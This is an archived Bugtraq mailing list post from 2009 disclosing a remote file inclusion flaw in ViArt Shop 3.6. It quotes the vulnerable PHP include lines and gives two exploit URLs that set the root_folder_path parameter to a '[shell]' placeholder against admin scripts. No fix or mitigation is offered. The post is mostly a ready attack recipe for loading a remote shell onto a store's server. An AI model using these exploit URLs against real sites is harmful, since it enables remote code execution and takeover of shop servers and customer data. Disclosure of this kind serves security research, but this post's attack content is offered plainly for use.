[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RFI Bug
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: RFI Bug
- From: Dr.linux@xxxxxxx
- Date: 16 Feb 2009 17:13:08 -0000
ViArt Shop 3.6 Remote File Include BUG
FreeDownload :
http://www.viart.com/tracking_downloads.php?fn=viart_shop-3.6.zip
#FOUND BY : Dr-Linux
#Mail : Dr.linux@xxxxxxx
include_once($root_folder_path."includes/common.php");
include_once($root_folder_path . "includes/record.php");
Exploi >>>
http://www.target/path/admin/admin_forgotten_password.php?root_folder_path=[shell]
include_once($root_folder_path . "messages/" . $language_code .
"/download_messages.php");
Exploit >>>
http://www.target/path/admin/admin_admin.php?root_folder_path=[shell]